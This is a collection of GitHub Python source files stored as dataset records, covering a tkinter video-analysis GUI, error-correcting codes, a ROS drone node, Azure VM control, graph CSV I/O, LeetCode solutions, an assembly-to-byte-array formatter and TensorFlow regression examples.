realTimeObj.logFile.close()\n realTimeObj.analysisFile.close()\n\n if self.variable4.get() == 'Count of Time':\n realTimeObj.frames = int(self.makeDataFramesSpinboxVar.get())\n realTimeObj.before()\n\n while realTimeObj.timePast() < realTimeObj.convertTimeToSeconds([int(self.makeDataTimeCountOfTimeHoursSpinboxVar.get()),\n int(self.makeDataTimeCountOfTimeMinutesSpinboxVar.get()),\n int(self.makeDataTimeCountOfTimeSecondsSpinboxVar.get())]):\n if realTimeObj.do:\n realTimeObj.run()\n else:\n break\n realTimeObj.logFile.close()\n realTimeObj.analysisFile.close()\n\n async def makeData(self):\n settings = Settings.getInstance()\n self.do_temp = True\n self.do_graph = True\n self.temperatureGetter()\n self.drawGraph()\n self.countOfProcess = len(settings.areasList) - 1\n threads = []\n for i in range(self.countOfProcess):\n self.realTimeList.append(RealTime(settings.areasList[i + 1]))\n t = threading.Thread(target=self.makingData, args=(self.realTimeList[i],))\n threads.append(t)\n \n time.sleep(1)\n for i in threads:\n i.start()\n\n for i in threads:\n i.join()\n\n self.do_temp = False\n self.do_graph = False\n\n def do_tasks(self, async_loop):\n \"\"\" Button-Event-Handler starting the asyncio part. \"\"\"\n threading.Thread(target=self._asyncio_thread, args=(async_loop,)).start()\n\n def makeDataTimeMethodInterfaceUpdate(self, *args, **kwargs):\n if self.variable4.get() == 'Count of Photos':\n try:\n self.makeDataTimeCountOfTimeContainer.grid_forget()\n except:\n pass\n\n self.makeDataTimeCountOfPhotosContainer = tk.Frame(self.makeDataContainer)\n self.makeDataTimeCountOfPhotosContainer.grid(row=1, column=2)\n self.makeDataTimeCountOfPhotosSpinboxVar = tk.StringVar(self.makeDataTimeCountOfPhotosContainer)\n self.makeDataTimeSetFromOptions()\n self.makeDataTimeCountOfPhotosSpinbox = tk.Spinbox(self.makeDataTimeCountOfPhotosContainer, from_=0,\n to=10000,\n textvariable=self.makeDataTimeCountOfPhotosSpinboxVar,\n width=21, command=self.makeDataTimeUpdateCountOfPhoto)\n self.makeDataTimeCountOfPhotosSpinbox.grid(row=0, column=0)\n\n if self.variable4.get() == 'Count of Time':\n try:\n self.makeDataTimeCountOfPhotosContainer.grid_forget()\n except:\n pass\n\n self.makeDataTimeCountOfTimeContainer = tk.Frame(self.makeDataContainer)\n self.makeDataTimeCountOfTimeContainer.grid(row=1, column=2)\n self.makeDataTimeCountOfTimeHoursSpinboxVar = tk.StringVar(self.makeDataTimeCountOfTimeContainer)\n self.makeDataTimeCountOfTimeMinutesSpinboxVar = tk.StringVar(self.makeDataTimeCountOfTimeContainer)\n self.makeDataTimeCountOfTimeSecondsSpinboxVar = tk.StringVar(self.makeDataTimeCountOfTimeContainer)\n self.makeDataTimeSetFromOptions()\n self.makeDataTimeCountOfTimeHoursLabel = ttk.Label(self.makeDataTimeCountOfTimeContainer, text='h')\n self.makeDataTimeCountOfTimeHoursLabel.grid(row=0, column=1)\n self.makeDataTimeCountOfTimeHoursSpinbox = tk.Spinbox(self.makeDataTimeCountOfTimeContainer, from_=0, to=12,\n textvariable=self.makeDataTimeCountOfTimeHoursSpinboxVar,\n width=5, command=self.makeDataTimeUpdateCountOfTimeH)\n self.makeDataTimeCountOfTimeHoursSpinbox.grid(row=0, column=0)\n self.makeDataTimeCountOfTimeMinutesLabel = ttk.Label(self.makeDataTimeCountOfTimeContainer, text='m')\n self.makeDataTimeCountOfTimeMinutesLabel.grid(row=0, column=3)\n self.makeDataTimeCountOfTimeMinutesSpinbox = tk.Spinbox(self.makeDataTimeCountOfTimeContainer, from_=0,\n to=59, textvariable=self.makeDataTimeCountOfTimeMinutesSpinboxVar,\n width=5, command=self.makeDataTimeUpdateCountOfTimeM)\n self.makeDataTimeCountOfTimeMinutesSpinbox.grid(row=0, column=2)\n self.makeDataTimeCountOfTimeSecondsLabel = tk.Label(self.makeDataTimeCountOfTimeContainer, text='s')\n self.makeDataTimeCountOfTimeSecondsLabel.grid(row=0, column=5)\n self.makeDataTimeCountOfTimeSecondsSpinbox = tk.Spinbox(self.makeDataTimeCountOfTimeContainer, from_=0, to=59,\n textvariable=self.makeDataTimeCountOfTimeSecondsSpinboxVar,\n width=5, command=self.makeDataTimeUpdateCountOfTimeS)\n self.makeDataTimeCountOfTimeSecondsSpinbox.grid(row=0, column=4)\n\n def updateMakeDataSettings(self):\n self.makeDataUpdateCountOfFrames()\n\n if self.variable4.get() == 'Count of Photos':\n self.makeDataTimeUpdateCountOfPhoto()\n\n if self.variable4.get() == 'Count of Time':\n self.makeDataTimeUpdateCountOfTimeH()\n self.makeDataTimeUpdateCountOfTimeM()\n self.makeDataTimeUpdateCountOfTimeS()\n\n def updateOptions(self):\n self.updateMakeDataSettings()\n\n self.after(self.delayOptions, self.updateOptions)\n\n def makeDataFramesSetFromOptions(self):\n settings = Settings.getInstance()\n if settings.countOfFrames != None:\n self.makeDataFramesSpinboxVar.set(str(settings.countOfFrames))\n\n def makeDataUpdateCountOfFrames(self):\n settings = Settings.getInstance()\n settings.countOfFrames = int(self.makeDataFramesSpinboxVar.get())\n\n def makeDataTimeUpdateCountOfPhoto(self):\n settings = Settings.getInstance()\n settings.countOfPhoto = int(self.makeDataTimeCountOfPhotosSpinboxVar.get())\n\n def makeDataTimeUpdateCountOfTimeH(self):\n settings = Settings.getInstance()\n settings.countOfTimeH = int(self.makeDataTimeCountOfTimeHoursSpinboxVar.get())\n\n def makeDataTimeUpdateCountOfTimeM(self):\n settings = Settings.getInstance()\n settings.countOfTimeM = int(self.makeDataTimeCountOfTimeMinutesSpinboxVar.get())\n\n def makeDataTimeUpdateCountOfTimeS(self):\n settings = Settings.getInstance()\n settings.countOfTimeS = int(self.makeDataTimeCountOfTimeSecondsSpinboxVar.get())\n\n def makeDataTimeSetFromOptions(self):\n settings = Settings.getInstance()\n\n if self.variable4.get() == 'Count of Photos':\n if settings.countOfPhoto != None:\n self.makeDataTimeCountOfPhotosSpinboxVar.set(str(settings.countOfPhoto))\n\n if self.variable4.get() == 'Count of Time':\n if settings.countOfTimeH != None:\n self.makeDataTimeCountOfTimeHoursSpinboxVar.set(str(settings.countOfTimeH))\n if settings.countOfTimeM != None:\n self.makeDataTimeCountOfTimeMinutesSpinboxVar.set(str(settings.countOfTimeM))\n if settings.countOfTimeS != None:\n self.makeDataTimeCountOfTimeSecondsSpinboxVar.set(str(settings.countOfTimeS))\n","repo_name":"iamn0x/Basic-Vid-Analyzer","sub_path":"views/realtimeanalysis.py","file_name":"realtimeanalysis.py","file_ext":"py","file_size_in_byte":22079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19511266805","text":"from sk_dsp_comm import fec_block as block\nimport commpy.channelcoding as cg\nfrom genpoly import cyclic_code_genpoly\nimport numpy as np\n\n# https://pysdr.org/content/channel_coding.html\n\nclass GestionErreur:\n def __init__(self, k, n):\n # fec_block.FECCyclic()\n self.k = k\n self.n = n\n pass\n\n def genpoly(self):\n # init code gestion erreur (1101)\n genpoly = format(cyclic_code_genpoly(self.n, self.k)[0], 'b')\n\n return genpoly, block.FECCyclic(genpoly)\n\n def codageCanal(self, matrice, fec_cyclic):\n n_ligne_matrice = len(matrice)\n matrice = np.reshape(matrice, np.size(matrice)).astype(int)\n codewords = fec_cyclic.cyclic_encoder(matrice)\n matrice = np.reshape(codewords, (n_ligne_matrice, self.n))\n\n return matrice\n\n def decodageCanal(self,matrice,fec_cyclic):\n n_ligne_matrice = len(matrice)\n matrice = np.reshape(matrice, np.size(matrice))\n decoded_message = fec_cyclic.cyclic_decoder(matrice)\n return np.reshape(decoded_message, (n_ligne_matrice, self.k))\n\n def tauxErreur(self,phrase_sans_erreur,phrase_erreur):\n tauxDErreur = {\"%erreur\":0,\"%ressemblance\":0}\n phrase_sans_erreur = phrase_sans_erreur[:100]\n phrase_erreur = phrase_erreur[:100]\n for i in range(len(phrase_sans_erreur)):\n if phrase_sans_erreur[i] == phrase_erreur[i]:\n # pas d'erreur\n tauxDErreur[\"%ressemblance\"] += 1\n else:\n tauxDErreur[\"%erreur\"] += 1\n tauxDErreur[\"%ressemblance\"] /= len(phrase_sans_erreur)\n tauxDErreur[\"%erreur\"] /= len(phrase_sans_erreur)\n return tauxDErreur\n\nif __name__ == '__main__':\n k = 57\n n = 63\n genpoly = format(cyclic_code_genpoly(n, k)[0], 'b')\n print(genpoly)\n","repo_name":"tellebma/tp-codage-CPE","sub_path":"gestionErreur.py","file_name":"gestionErreur.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20142131082","text":"#!/usr/bin/env python\n\nimport rospy, mavros\nimport math\nfrom mavros_msgs.srv import CommandBool, SetMode\nfrom mavros_msgs.msg import State\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import PoseStamped, TwistStamped\nfrom custom_msgs.msg import StateMachine\n\nflight_state = None\ncurrent_state = None\ncurrent_pos = None\ndestination_pos = None\n\ndef callback(data):\n\t\n\tglobal flight_state\n\tflight_state = data.flight\n\t# print(str(flight_state))\n\ndef getCurrentState(data):\n\n\tglobal current_state\n\tcurrent_state = data\n\ndef getCurrentPosition(data):\n\n\tglobal current_pos\n\tcurrent_pos = data\n\t\ndef getDestination(data):\n\tglobal destination\n\tdestination = data\n\ndef flightCallback(data):\n\tglobal destination\n\tdestination = data\n\tlocal_pos_pub.publish(data)\n\nif __name__=='__main__':\n\n\trospy.init_node('flight_node', anonymous=True)\n\n\trospy.Subscriber(\"/state_machine/state\", StateMachine, callback)\n\trospy.Subscriber(\"/mavros/state\", State, getCurrentState)\n\trospy.Subscriber('/mavros/local_position/odom', Odometry, getCurrentPosition)\n\t\n\tlocal_pos_pub = rospy.Publisher(\"/mavros/setpoint_position/local\", PoseStamped, queue_size=100)\n\tstate_pub = rospy.Publisher('/state_machine/state', StateMachine, queue_size=100)\n\t\n\t#service proxies for arming and setting mode\n\tarmCommandSrv = rospy.ServiceProxy(\"/mavros/cmd/arming\", CommandBool)\n\tsetModeSrv = rospy.ServiceProxy(\"/mavros/set_mode\", SetMode) #http://wiki.ros.org/mavros/CustomModes\n\n\t#msgs sent at 60hz\n\trate = rospy.Rate(60)\n\n\n\t#StateMachine msg that will switch Lakitu to 'hover' state\n\tstate = StateMachine()\n\tstate.preflight = False\n\tstate.takeoff = False\n\tstate.flight = False\n\tstate.hover = True\n\tstate.land = False\n\tstate.emergency = False\n\tstate.manual = False\n\n\tdestination = PoseStamped()\n\tdestination.pose.position.x = 0\n\tdestination.pose.position.y = 0\n\tdestination.pose.position.z = 0\n\n\t# last_request = rospy.Time.now()\n\n\t# flag = True\n\t#main loop of program\n\twhile not rospy.is_shutdown():\n\n\t\tif(flight_state is None):\n\t\t\tcontinue\n\t\tif(current_state is None):\n\t\t\tcontinue\n\t\tif(current_pos is None):\n\t\t\tcontinue\t\n\n\t\tif(flight_state):\n\n\t\t\trospy.Subscriber(\"/lakitu/flight_target\", PoseStamped, flightCallback)\n\n\t\t\tif(current_state.mode != \"OFFBOARD\"):\n\t\t\t\tsetModeSrv(0, 'OFFBOARD')\n\t\t\t# local_pos_pub.publish(destination)\t\n\n\n\t\t\t#this block of code causes strange behavior\t\n\t\t\tif(current_pos.pose.pose.position.x >= destination.pose.position.x - float(0.1) )\\\n\t\t\t and (current_pos.pose.pose.position.x <= destination.pose.position.x + float(0.1))\\\n\t\t\t and (current_pos.pose.pose.position.y >= destination.pose.position.y - float(0.1))\\\n\t\t\t and (current_pos.pose.pose.position.y <= destination.pose.position.y + float(0.1))\\\n\t\t\t and (current_pos.pose.pose.position.z >= destination.pose.position.z - float(0.1))\\\n\t\t\t and (current_pos.pose.pose.position.z <= destination.pose.position.z + float(0.1)):\n\t\t\t \tstate_pub.publish(state)\n\t\n\t\trate.sleep()\n","repo_name":"RoboticsClubatUCF/Laki2","sub_path":"catkin_ws/src/laki2_states/src/old/flight.py","file_name":"flight.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"72220156168","text":"import csv\r\nimport os\r\nfrom ..classes import Graph, DiGraph\r\n\r\ndef infer_types( row):\r\n types = []\r\n for val in row:\r\n try:\r\n int(val)\r\n types.append(int)\r\n except ValueError:\r\n try:\r\n float(val)\r\n types.append(float)\r\n except ValueError:\r\n types.append(str)\r\n return types\r\n\r\ndef read_csv(path, delimiter=',', directed=False):\r\n\r\n adjacency_list = {}\r\n vertices = {}\r\n\r\n with open(f'{path}/edges.csv', mode='r', newline='') as edges_file:\r\n reader = csv.reader(edges_file, delimiter=delimiter)\r\n header = next(reader)\r\n if len(header) == 2:\r\n for row in reader:\r\n source, target = int(row[0]), int(row[1])\r\n if source not in adjacency_list:\r\n adjacency_list[source] = {target:{}}\r\n else:\r\n adjacency_list[source][target] = {}\r\n if target not in adjacency_list:\r\n adjacency_list[target] = {source:{}}\r\n else:\r\n adjacency_list[target][source] = {}\r\n else:\r\n first_row = next(reader)\r\n attribute_names = header[2:]\r\n attribute_types = infer_types(first_row[2:])\r\n edges_file.seek(0)\r\n header = next(reader)\r\n for row in reader:\r\n source, target = int(row[0]), int(row[1])\r\n attr = {a: t(v) for a, t, v in zip(attribute_names, attribute_types, row[2:])}\r\n if source not in adjacency_list:\r\n adjacency_list[source] = {target:attr}\r\n else:\r\n adjacency_list[source][target] = attr\r\n if target not in adjacency_list:\r\n adjacency_list[target] = {source:attr}\r\n else:\r\n adjacency_list[target][source] = attr\r\n \r\n if os.path.isfile(f'{path}/vertices.csv'):\r\n vertices = {}\r\n with open(f'{path}/vertices.csv', mode='r', newline='') as vertices_file:\r\n reader = csv.reader(vertices_file, delimiter=delimiter)\r\n header = next(reader)\r\n if len(header) == 1:\r\n for row in reader:\r\n vertices[int(row[0])] = {}\r\n else:\r\n first_row = next(reader)\r\n attribute_names = header[1:]\r\n attribute_types = infer_types(first_row[1:])\r\n edges_file.seek(0)\r\n header = next(reader)\r\n for row in reader:\r\n vertex = int(row[0])\r\n attr = {a: t(v) for a, t, v in zip(attribute_names, attribute_types, row[2:])}\r\n vertices[vertex] = attr\r\n else:\r\n vertices = {v: [] for v in adjacency_list}\r\n\r\n return adjacency_list, vertices\r\n\r\ndef write_csv(path, adjacency_list, vertices=None, delimiter=','):\r\n\r\n os.makedirs(path, exist_ok=True)\r\n\r\n with open(f'{path}/edges.csv', mode='r', newline='') as edges_file:\r\n writer = csv.writer(edges_file, delimiter=delimiter)\r\n writer.writerow(['source', 'target'] + G._edge_attr)\r\n for source, neighbourhood in G._adj.items():\r\n for target, attr in neighbourhood.items():\r\n writer.writerow([source, target]+attr) \r\n\r\n with open(f'{path}/vertices.csv', mode='r', newline='') as vertices_file:\r\n writer = csv.writer(vertices_file, delimiter=delimiter)\r\n writer.writerow(['vertex'] + G._vert_attr)\r\n for vertex, attr in G._adj.items():\r\n writer.writerow([source]+attr)","repo_name":"bsulyok/graphx","sub_path":"graphx/readwrite/csv.py","file_name":"csv.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"52095979246","text":"class Solution:\n def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:\n greater_dict = {}\n\n stack = [nums2[0]]\n\n for i in range(1, len(nums2)):\n while(stack and nums2[i] > stack[-1]):\n greater_dict[stack.pop()] = nums2[i]\n stack.append(nums2[i])\n\n for j in stack:\n greater_dict[j] = -1\n\n return [greater_dict[i] for i in nums1]\n","repo_name":"ibsa21/A2SV-practise-questions","sub_path":"Week 6/day 5/next_greater_number.py","file_name":"next_greater_number.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25676499232","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.autosummary\",\n \"sphinx.ext.napoleon\",\n \"sphinx.ext.coverage\",\n \"sphinx.ext.doctest\",\n \"sphinx.ext.extlinks\",\n \"sphinx.ext.ifconfig\",\n \"sphinx.ext.todo\",\n \"sphinx.ext.viewcode\",\n]\nsource_suffix = \".rst\"\nmaster_doc = \"index\"\nproject = \"TimeThese\"\nyear = \"2020\"\nauthor = \"Joachim W. Bargsten\"\ncopyright = \"{0}, {1}\".format(year, author)\nversion = release = \"0.0.7\"\n\npygments_style = \"trac\"\ntemplates_path = [\".\"]\nextlinks = {\n \"issue\": (\"https://github.com/jwbargsten/python-timethese/issues/%s\", \"#\"),\n \"pr\": (\"https://github.com/jwbargsten/python-timethese/pull/%s\", \"PR #\"),\n}\n\nhtml_use_smartypants = True\nhtml_last_updated_fmt = \"%b %d, %Y\"\nhtml_split_index = False\nhtml_sidebars = {\n \"**\": [\"searchbox.html\", \"globaltoc.html\", \"sourcelink.html\"],\n}\nhtml_short_title = \"%s-%s\" % (project, version)\n\nnapoleon_use_ivar = True\nnapoleon_use_rtype = False\nnapoleon_use_param = False\n","repo_name":"jwbargsten/python-timethese","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"23294641521","text":"from typing import List\r\nclass Solution:\r\n def maxEnvelopes(self, envelopes: List[List[int]]) -> int:\r\n if not envelopes:\r\n return 0\r\n n=len(envelopes)\r\n envelopes.sort()\r\n dp=[1]*n\r\n for i in range(n):\r\n for j in range(i):\r\n if envelopes[i][0]>envelopes[j][0] and envelopes[i][1]>envelopes[j][1]:\r\n dp[i]=max(dp[i],dp[j]+1)\r\n print(dp[i])\r\n num=max(dp)\r\n return num\r\na=Solution()\r\n\r\nprint(a.maxEnvelopes([[1,2],[1,3],[5,6],[3,4]]))\r\n\r\n# Dynamic programming.\r\n# class Solution:\r\n# def lengthOfLIS(self, nums: List[int]) -> int:\r\n# if not nums: return 0\r\n# dp = [1] * len(nums)\r\n# for i in range(len(nums)):\r\n# for j in range(i):\r\n# if nums[j] < nums[i]: # 如果要求非严格递增,将此行 '<' 改为 '<=' 即可。\r\n# dp[i] = max(dp[i], dp[j] + 1)\r\n# print(dp[i],i)\r\n# return max(dp)\r\n# a=Solution()\r\n#\r\n# print(a.lengthOfLIS(nums = [10,9,2,5,3,7,101,18]))","repo_name":"wudale111/leecode","sub_path":"src/动态规划/书本叠放.py","file_name":"书本叠放.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"5215979944","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: wushaohong\n@time: 2020/9/29 下午6:21\n\"\"\"\n\"\"\"345. 反转字符串中的元音字母\n编写一个函数,以字符串作为输入,反转该字符串中的元音字母。\n\n示例 1:\n\n输入:\"hello\"\n输出:\"holle\"\n示例 2:\n\n输入:\"leetcode\"\n输出:\"leotcede\"\n \n提示:\n\n元音字母不包含字母 \"y\" 。\n\"\"\"\n\n\nclass Solution:\n def reverseVowels(self, s: str) -> str:\n yu = set('aeiouAEIOU')\n # s=list(s)\n i = 0\n j = len(s) - 1\n while i < j:\n while s[i] not in yu and i < j:\n i += 1\n while s[j] not in yu and i < j:\n j -= 1\n if i >= j:\n break\n s = s[:i] + s[j] + s[i + 1:j] + s[i] + s[j + 1:]\n i += 1\n j -= 1\n return s\n\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.reverseVowels('leetcode'))\n","repo_name":"hshrimp/letecode_for_me","sub_path":"letecode/241-360/341-360/345.py","file_name":"345.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"8398107379","text":"from django.urls import path\r\nfrom food.views import *\r\n\r\nurlpatterns = [\r\n path('foodinput', inputfood, name=\"input\"),\r\n path('test/', test, name=\"test\"),\r\n path('find', test2, name=\"test2\"),\r\n path('test3/', test3, name=\"test3\"),\r\n path('session_end/', session_end, name=\"session_end\"),\r\n path('session_in/', session_in, name=\"session_in\"),\r\n\r\n]\r\n","repo_name":"csangh94/Django_projcet","sub_path":"gym_project/food/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70897062409","text":"\"\"\"Create and manage virtual machines.\"\"\"\n\nimport traceback\n\nfrom azure.mgmt.compute import ComputeManagementClient\nfrom azure.identity import ClientSecretCredential\nfrom msrestazure.azure_exceptions import CloudError\nfrom config import GROUP_NAME, VM_NAME, SUBSCRIPTION_ID, TENANT_ID, CLIENT_ID, CLIENT_SECRET\n\n\ndef get_credentials():\n subscription_id = SUBSCRIPTION_ID\n credentials = ClientSecretCredential(\n tenant_id=TENANT_ID,\n client_id=CLIENT_ID,\n client_secret=CLIENT_SECRET\n )\n return credentials, subscription_id\n\n\ndef start_vm(vm_number):\n \"\"\"Virtual Machine management example.\"\"\"\n #\n # Create all clients with an Application (service principal) token provider\n #\n credentials, subscription_id = get_credentials()\n # resource_client = ResourceManagementClient(credentials, subscription_id)\n compute_client = ComputeManagementClient(credentials, subscription_id)\n # network_client = NetworkManagementClient(credentials, subscription_id)\n\n ###########\n # Prepare #\n ###########\n\n try:\n\n # Start the VM\n print('\\nStart VM')\n async_vm_start = compute_client.virtual_machines.begin_start(\n GROUP_NAME, VM_NAME[vm_number])\n async_vm_start.wait()\n\n except CloudError:\n print('A VM operation failed:\\n{}'.format(traceback.format_exc()))\n return False\n else:\n print('All example operations completed successfully!')\n return True\n finally:\n pass\n\n\ndef stop_vm(vm_number):\n \"\"\"Virtual Machine management example.\"\"\"\n #\n # Create all clients with an Application (service principal) token provider\n #\n credentials, subscription_id = get_credentials()\n # resource_client = ResourceManagementClient(credentials, subscription_id)\n compute_client = ComputeManagementClient(credentials, subscription_id)\n # network_client = NetworkManagementClient(credentials, subscription_id)\n\n ###########\n # Prepare #\n ###########\n\n try:\n\n # Stop the VM\n\n print('\\nStop VM')\n async_vm_stop = compute_client.virtual_machines.begin_power_off(\n GROUP_NAME, VM_NAME[vm_number])\n async_vm_stop.wait()\n\n print('\\nDeallocate VM')\n async_vm_deallocate = compute_client.virtual_machines.begin_deallocate(\n GROUP_NAME, VM_NAME[vm_number])\n async_vm_deallocate.wait()\n\n except CloudError:\n print('A VM operation failed:\\n{}'.format(traceback.format_exc()))\n return False\n else:\n print('All example operations completed successfully!')\n return True\n\n\nif __name__ == \"__main__\":\n start_vm()\n","repo_name":"hangrycookie/cloud-gaming-portal","sub_path":"api/vm.py","file_name":"vm.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"10788791264","text":"import numpy as np\nfrom scipy.special import erf\nfrom scipy.stats import gaussian_kde\n\nclass Bounded_kde(gaussian_kde):\n r\"\"\"Represents a one-dimensional Gaussian kernel density estimator\n for a probability distribution function that exists on a bounded\n domain.\"\"\"\n\n def __init__(self, pts, low=None, high=None, *args, **kwargs):\n \"\"\"Initialize with the given bounds. Either ``low`` or\n ``high`` may be ``None`` if the bounds are one-sided. Extra\n parameters are passed to :class:`gaussian_kde`.\n\n :param low: The lower domain boundary.\n\n :param high: The upper domain boundary.\"\"\"\n pts = np.atleast_1d(pts)\n\n assert pts.ndim == 1, 'Bounded_kde can only be one-dimensional'\n \n super(Bounded_kde, self).__init__(pts, *args, **kwargs)\n\n self._low = low\n self._high = high\n\n @property\n def low(self):\n \"\"\"The lower bound of the domain.\"\"\"\n return self._low\n\n @property\n def high(self):\n \"\"\"The upper bound of the domain.\"\"\"\n return self._high\n\n def evaluate(self, xs):\n \"\"\"Return an estimate of the density evaluated at the given\n points.\"\"\"\n xs = np.atleast_1d(xs)\n assert xs.ndim == 1, 'points must be one-dimensional'\n\n pdf = super(Bounded_kde, self).evaluate(xs)\n\n if self.low is not None:\n pdf += super(Bounded_kde, self).evaluate(2.0*self.low - xs)\n\n if self.high is not None:\n pdf += super(Bounded_kde, self).evaluate(2.0*self.high - xs)\n\n return pdf\n\n __call__ = evaluate\n","repo_name":"farr/plotutils","sub_path":"plotutils/bounded_kde.py","file_name":"bounded_kde.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"6225916420","text":"import re\n\n\ninputstring = \\\n\"\"\"\nvolatile void stump(void) {\n\tchar a = 0;\n88 44 24 24 mov byte ptr [rsp+24h],al\n\tchar b = 0;\n88 44 24 25 mov byte ptr [rsp+25h],al\n\n\t__asm {\n\t\tmov rax, [a];\n48 8A 44 24 24 mov al,byte ptr [rsp+24h]\n\t\tmov rbx, [b];\n48 8A 5C 24 25 mov bl,byte ptr [rsp+25h]\n\t\tmov [b], rax;\n48 88 44 24 25 mov byte ptr [rsp+25h],al\n\t\tmov [a], rbx;\n48 88 5C 24 24 mov byte ptr [rsp+24h],bl\n\tstump();\n}\n\"\"\"\n\noutput = \\\n\"\"\"\nBYTE shellcode[{bytes}] = {{\\n\\\n{byte_block}\n}};\n\"\"\"\n\ncontent = \"\"\n\nregex = r\"^([0-9,A-F ]{2,})(.*)\"\n\n\nreg = re.compile(regex, re.MULTILINE)\n\n\nlines = reg.findall(inputstring)\nprint(inputstring)\n\nblock = ''\nnumber_of_bytes = 0\nfor line in lines:\n print(line)\n formatted_line = '\\t'\n bytes_on_line = line[0].strip().split(' ')\n number_of_bytes += len(bytes_on_line)\n for opcode in line[0].strip().split(' '):\n formatted_line += '0x' + str(opcode) + ', '\n formatted_line += \" \"*((60 - len(bytes_on_line)*6)) + \"//\" + line[1].strip() + '\\n'\n block += formatted_line\n\n\nprint(output.format(bytes=number_of_bytes,byte_block=block))","repo_name":"N0K0/pytomatic","sub_path":"pytomatic/beta_tools/shelly.py","file_name":"shelly.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"32256239418","text":"\ndef main():\n somme = 0\n for i in range(1, 1001):\n somme += number_letter_count(i)\n print(somme)\n\n\nNUMBERS_LETTERS = {\n 0: 'zero',\n 1: 'one',\n 2: 'two',\n 3: 'three',\n 4: 'four',\n 5: 'five',\n 6: 'six',\n 7: 'seven',\n 8: 'eight',\n 9: 'nine',\n 10: 'ten',\n 11: 'eleven',\n 12: 'twelve',\n 13: 'thirteen',\n 14: 'fourteen',\n 15: 'fifteen',\n 16: 'sixteen',\n 17: 'seventeen',\n 18: 'eighteen',\n 19: 'nineteen',\n 20: 'twenty',\n 30: 'thirty',\n 40: 'forty',\n 50: 'fifty',\n 60: 'sixty',\n 70: 'seventy',\n 80: 'eighty',\n 90: 'ninety',\n 100: 'onehundred',\n 1000: 'onethousand',\n}\n\n\n\ndef number_letter_count(num: int) -> int :\n global NUMBERS_LETTERS\n if num in NUMBERS_LETTERS:\n return len(NUMBERS_LETTERS[num])\n\n number = str(num)\n hundreds, tens, ones = '', '', ''\n\n for i in range (len(number)):\n digit = int(number[i])\n if digit == 0:\n continue\n\n if len(number) - i == 3: # hundreds\n hundreds = NUMBERS_LETTERS[digit] + ' hundred and '\n elif len(number) - i == 2: # tens\n if digit != 1:\n tens = NUMBERS_LETTERS[digit * 10] \n else:\n tens = NUMBERS_LETTERS[digit * 10 + int(number[i+1])]\n break\n elif len(number) - i == 1: # ones\n ones = NUMBERS_LETTERS[digit]\n\n word = hundreds + tens + ones\n if word[-4:] == 'and ':\n word = word[:-4]\n return len(word) - word.count(' ')\n \n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mounirmelzi/project-euler-solutions","sub_path":"17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21072160922","text":"\n# y =wx + b \n# w , b 변수로 두고 x,y는 입력되는 값이므로 placeholder로\n\nimport tensorflow as tf\ntf.compat.v1.set_random_seed(66)\n\n# x_train = [1,2,3]\n# y_train = [1,2,3]\n\nx_train =tf.compat.v1.placeholder(tf.float32, shape=[None])\ny_train =tf.compat.v1.placeholder(tf.float32, shape=[None])\n\n\n# W = tf.Variable(1, dtype=tf.float32) \n# b = tf.Variable(1, dtype=tf.float32) \n\n\nW = tf.Variable(tf.compat.v1.random_normal([1]), dtype=tf.float32) \nb = tf.Variable(tf.compat.v1.random_normal([1]), dtype=tf.float32) \n\nhypothesis = x_train *W +b\n#hypothesis 얘랑 f(x) 즉 y이랑 같은 말임! =f(x) = wx +b\n\nloss = tf.reduce_mean(tf.square(hypothesis - y_train)) # mse\n# ==> 평균(제곱(예측값 -실제값))\n\noptimizer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=0.01)\ntrain = optimizer.minimize(loss)\n\n###########################여기까지가 연산할 수 있는 그래프 모양만 만든것이다###################3333\n\nsess = tf.compat.v1.Session()\nsess.run(tf.global_variables_initializer()) #위에 선언한 변수때문에\n\nfor step in range(2001):\n _, loss_val,W_val, b_val = sess.run([train, loss,W,b], \n feed_dict={x_train:[1,2,3],y_train:[1,2,3]})\n #실행하는 부분에서 feed를 먹이고 그값이 여러가지들이 실행되는 곳에서 적용\n if step % 20 ==0:\n # print(step, sess.run(loss), sess.run(W),sess.run(b))\n print(step, loss_val,W_val, b_val)\n\nprint('끗')\n","repo_name":"wonjunchoi-arc/tensorflow1","sub_path":"TF114/tf08_1_plcaeholder(Placeholder써서 